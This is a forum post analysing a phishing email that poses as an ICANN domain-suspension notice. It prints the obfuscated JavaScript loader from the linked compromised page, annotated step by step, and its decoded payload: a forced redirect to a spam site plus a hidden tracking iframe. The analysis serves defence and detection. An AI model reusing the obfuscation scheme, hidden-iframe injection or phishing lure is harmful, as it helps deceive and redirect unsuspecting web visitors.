Another utterly stupid attempt:
Quote:
Subject: Your Domain Has Been Suspended
From: "ICANN Services" <alert
@icann.org>
Letter from ICANN (the Internet Corporation for Assigned Names And Numbers)
Your Domain Has Been Suspended.
Click here for more information:
http
://booksalon.kr/index2.html
Please contact billing/support center A.S.A.P
[email protected]
booksalon.kr is of course another compromised server. Index2.html contains some of the more ridiculous obfuscation these attackers use. I'll wrap it for legibility.
Code:
// Analyst notes on the loader served by index2.html. The code below is left
// exactly as pasted in the post, including the forum line-wrapping, which
// cuts several string literals across lines -- it will not run in this form.
// How it reads, in order of execution:
//  * EWgUi is the empty string, VvIf is the string 'replace' and mGdujq is
//    `this` at script top level (the global object in a browser).
//  * Every sensitive property name is rebuilt at runtime by stripping filler
//    characters from a scrambled word, e.g.
//    'lGeNnGgNtThG'[VvIf](/[GzTNV]/g, EWgUi) -> "length". The same trick
//    yields "String", "fromCharCode", "charCodeAt", "substring", "eval" and
//    "unescape" further down.
//  * The many `var a, b; if (a<b){a=b+c;}` fragments compare undeclared or
//    undefined variables and are padding only; they never affect the payload.
//  * The payload is carried in the short string fragments (qxSH, aCn, MET,
//    KBL, XMdHkJ, ...), concatenated into aCMjf in their real order, mapped to
//    a percent-encoded string by the substitution table built from BEQHEO
//    (applied through a first eval), decoded with unescape, XOR-13 decoded by
//    ltY(), and finally handed to a second eval. That last step produces the
//    document.write shown later in the post.
// For detection purposes the reliable tells are the reconstructed
// "eval"/"unescape"/"fromCharCode" names and the repeated
// 'scrambled'[VvIf](/[filler]/g, '') pattern, not the variable names.
var EWgUi ;EWgUi= '' ; var DD , Gz,KpsHj;if (KpsHj<DD || DD<Gz){DD=Gz-
KpsHj;}var mGdujq=this ; var VvIf =''+'replace' ; var XMdHkJ; XMdHkJ
='';XMdHkJ =
'9sdU7i2i2sfs8NcN2i3Ncs8ses9N4N3seN5N8N0NcN1N8i3NeN2N0i2N4N3N9N8s5i3sd
N'; var KqO, XZoWC ;var zt ; zt= 339 ;if (KqO==XZoWC){KqO=
XZoWC+zt;}var HcxN= 'sfU3'; var qxSH;qxSH='';qxSH =
'N9N2Nes8N0N8N3s9i3sasfN4s9N8i5ifmagcg4m9idU9idmeg8geg2g3g9i3i3i3U1N0N
8s9NcidN5s9s9sdi0N8scs8N4sbU0m1ifsfN8NbsfN8seN5m1ifidNeN2N3s9N8'; var
fKVrBy;fKVrBy ='Uciaidses9s4N1N8U0iasbN4seN';var Ywfno='ydbqw'; var
cAT=252;var MmIj=479;var OGy ; OGy =931 ; if
(cAT>MmIj){cAT=MmIj+OGy;}var fh ;fh ='';var emnJ , aBhJ , vAE ;if
(vAE>emnJ && emnJ<=aBhJ){emnJ=aBhJ+vAE; }fh =
'ciaidN5N8N4NaN5s9U0ia';var oyGzhN ;oyGzhN = '';var GADYNJ, LkVmEI
;var BUPZxW =446; if (BUPZxW<GADYNJ || GADYNJ>=LkVmEI){GADYNJ =LkVmEI
- BUPZxW; }oyGzhN ='4U6' ; var qXO;qXO= 582 ; var AH = 23;var cP= 720;
if (cP<qXO || qXO<=AH){qXO = AH-cP ; }var EBMxEe=
'5sdU2sdN4N9U0UcUdiai';var OKh ,Km;var OmPz =766; if (OmPz= OKh ||
OKh==Km){OKh=Km+OmPz;}var Illshy ;Illshy ='' ; Illshy
='4N9N9N8N3U6';var MET;MET = ''; var XlM , VnFIU,wRL ; if (wRL<XlM &&
XlM>=VnFIU){XlM =VnFIU+wRL ; }MET='m1ifidi2U3U1N4Nb'; var kCEEn =198 ;
var mHR, GhGv ; if (kCEEn==mHR){kCEEn =mHR^GhGv; }var ZgM=
'IvxLRJCcKGfDMW' ;var HtaU;HtaU ='4NfN4N1N4s9s4U7idN5N'; var etHAM=
'ifi' ; var fnYhiV= 'MrCP';var MIL ;MIL = '' ;var kR= 109; var Cbq,
eMTx; if (kR>Cbq){kR = Cbq^eMTx ;}MIL = 'dsaN4N9s9N5U0iaU' ;var
KBL='sfNcN0N8idsesfNeU0iaN5s9s';var TAcsH= 231 ; var jBEgFQ; jBEgFQ =
173 ;var xjtMSO= 637; if (xjtMSO>TAcsH || TAcsH<jBEgFQ){TAcsH =
jBEgFQ/xjtMSO ;}var BdkA ='CJYbypzeBpaTqdGYi';var Ilj= '3U1i2N4N';var
HqP; HqP ='iaU' ;var BazxfH ,QaK ,INxI ; if (INxI= BazxfH ||
BazxfH>QaK){BazxfH = QaK-INxI; }var iZj='rWbbcUOmoAzXl';var LwQ;LwQ=
'1Nf' ;var zbRlIK ='uzpFLWMkxKHVQhc'; var HjN =767 ;var cE;cE =
513;var ZmmMl; ZmmMl=480;if (HjN<=cE){HjN = cE+ZmmMl; }var aCn
='N3s9U0m1ifU9U6s8sfN1U0N5s9s9sdU7i2i2N2NeNes8sfN1N8Ncses9i3NeN2N0' ;
var HcCux ='blJhHhEbWEoNlD'; var Xsx,YPgqhV ; var XPGpZ ;XPGpZ =184;
// ltY(pEs), declared at the end of the next line, is the decoder: the four
// scrambled strings inside it reduce to "length", "String", "fromCharCode"
// and "charCodeAt", so each char code of pEs is XORed with 13 and appended to
// the result. Note the loop index mo is never declared (implicit global).
if (Xsx>=YPgqhV){Xsx= YPgqhV^XPGpZ ;}function ltY(pEs){var pEa =
EWgUi;for(mo =0 ; mo<pEs['lGeNnGgNtThG'[VvIf](/[GzTNV]/g , EWgUi)];
++mo){pEa=pEa+mGdujq['SotorFidndgo'[VvIf](/[odCTF]/g,
EWgUi)]['fDrqoqmQCqhQaQrQCqoqdsel'[VvIf](/[lsqDQ]/g
,EWgUi)](13^pEs['cuhnaurLCnozdSeuALtn'[VvIf](/[nSuzL]/g,EWgUi)](mo)) ;
}return pEa;}var uvwUAp = 'bsfNcN0N8U3U'; var mwRD ; mwRD=EWgUi;var
aCMjf = qxSH+aCn ;aCMjf=aCMjf+MET+KBL;aCMjf= aCMjf+XMdHkJ;
aCMjf=aCMjf+EBMxEe;aCMjf=aCMjf+MIL+fh ;aCMjf =aCMjf+fKVrBy;aCMjf
=aCMjf+HtaU ; aCMjf = aCMjf+Illshy; aCMjf= aCMjf+HqP+Ilj+uvwUAp+LwQ
;aCMjf = aCMjf+HcxN+etHAM+oyGzhN+mwRD; var BEQHEO=
// Substitution table. After the two replace() calls on this statement,
// BEQHEO reads "%m¹5%t¹1%i¹2%s¹7%w¹0%N¹6%U¹3%x¹9%y¹8%g¹4": pairs of
// (marker letter, hex digit). GHDCO below expands every "%" and "¹" into the
// source text of a replace() call, i.e. it writes JavaScript as a string.
'CmV5Bto1ciL2Msj7ewa0ANE6PUW3ZxF9fyT8dgQ4'[VvIf](/[CBcMeAPZfd]/g,'\%')
[VvIf](/[VoLjaEWFTQ]/g , '\¹');var gLM ,ogzW ;var YhEv = 531 ;if
(YhEv= gLM && gLM>ogzW){gLM =ogzW^YhEv; }var MwqIkO="')[VvIf](/[";var
nsPtv= "]/g,'%"; var GHDCO
=BEQHEO[VvIf](/[\%]/g,MwqIkO)[VvIf](/[\¹]/g, nsPtv) ;var dnAJz; dnAJz
// First eval ('eyvZaZlN' minus its filler is "eval"): runs
// "var IuO= aCMjf" + the replace() chain from GHDCO (its leading "')" is
// dropped by substring(2, length)), turning aCMjf into a percent-encoded
// byte string. The "var kX= 429 ..." inside the eval'd text is more padding.
=VvIf ;mGdujq['eyvZaZlN'[dnAJz](/[NZbyg]/g ,EWgUi)]('var IuO=
aCMjf'+GHDCO['sTuwbwswtMrMiUnLgw'[VvIf](/[wUTLM]/g, EWgUi)](2 ,
GHDCO['lbeNnbgstNhZ'[VvIf](/[ZNbsq]/g, EWgUi)])+"') ;var kX= 429; var
rB ,vTS; if (kX==rB){kX=rB^vTS ;}") ;var LmNE, MarhR;var Sf = 883 ;if
(Sf>LmNE || LmNE==MarhR){LmNE
// Second eval ('euvLaulm' -> "eval"): unescape() IuO (the name is rebuilt
// from 'uhnKehsKcKaKpleo' and looked up through a one-element array, which
// coerces to the same string), XOR-13 decode it with ltY, then execute the
// result -- the document.write block quoted further down the post.
=MarhR+Sf;}mGdujq['euvLaulm'[VvIf](/[muzLc]/g,
EWgUi)](ltY(mGdujq[['uhnKehsKcKaKpleo'[VvIf](/[oKhlE]/g,
EWgUi)]](IuO))); var ryCbCw=950 ;var ZgYL , vGF;if
(ryCbCw>ZgYL){ryCbCw =ZgYL+vGF;}
That looks more confusing than it is. They obfuscate the actual JavaScript commands, but it's still a really obvious and easy thing to get past.
The resulting output after all that is (again: wrapped for clarity):
Code:
// Decoded payload, as recovered by the post author from the loader above. It
// is a single document.write (wrapped across lines here, so the string
// literal is not valid as pasted) that injects a <meta refresh> sending the
// visitor to the occurleast.com site after 4 seconds, plus a 1x1,
// visibility:hidden iframe to the second host -- the part that, per the
// author's note below, appears to be blank and may only track visits.
document.write("WAIT 4 SECOND...<meta http-equiv=\"refresh\" content=\"4;url=http://occurleast.com\" />
<iframe src='http://ruao.austinshemale.com/index.php?pid=10' width='1' height='1' style='visibility: hidden;'>
</iframe><br>");
So: they go to all this trouble, lying about being ICANN, lying about "your domain" being suspended, then presenting ridiculously obfuscated javascript... to send you to another Spamit site? What a waste of time.
Oddly enough, occurleast is not hosted via fast flux, but it has six (6) DNS servers. Somebody must have been burned in the past.
The austinshemale.com iframe is blank, possibly just to track visits.
Just another really stupid attempt. Who on earth would be clicking through this garbage and actually buying anything?!
SiL